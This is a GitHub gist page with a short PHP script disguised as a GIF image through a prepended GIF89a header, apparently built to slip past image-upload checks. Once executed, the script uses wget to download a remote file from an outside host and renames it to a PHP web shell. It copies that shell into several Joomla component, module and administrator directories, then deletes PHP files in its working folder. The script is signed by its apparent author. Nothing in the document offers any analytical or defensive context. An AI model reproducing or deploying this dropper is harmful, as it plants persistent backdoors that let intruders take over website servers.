Skip to content

Instantly share code, notes, and snippets.

@PalmaSolutions
Created May 11, 2017 07:34
Show Gist options
  • Select an option

  • Save PalmaSolutions/d1d554141d2b4b47bdadfc49464c001d to your computer and use it in GitHub Desktop.

Select an option

Save PalmaSolutions/d1d554141d2b4b47bdadfc49464c001d to your computer and use it in GitHub Desktop.
GIF89a1
gif89;a
GIF89a1
<?php
$mypath = "images" ;
mkdir ( $mypath , 0777 , TRUE );
system("cd images; wget http://blog.ttgv.org.tr/wp-content/themes/default/x.txt; mv x.txt x.php; echo x>index.html");
system("cp ./images/x.php ../../tmp/w.php");
system("cp ./images/x.php ../../components/com_contact/views/w.php");
system("cp ./images/x.php ../../modules/mod_login/w.php");
system("cp ./image/x.php ../../administrator/components/com_contact/w.php");
system("cp ./images/x.php ../../includes/Archive/w.php");
system("cp ./images/x.php ../../includes/domit/w.php");
echo "by iskorpitx" ;
system("rm -rf *.php");
fclose ( $handle );
?>
isko
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment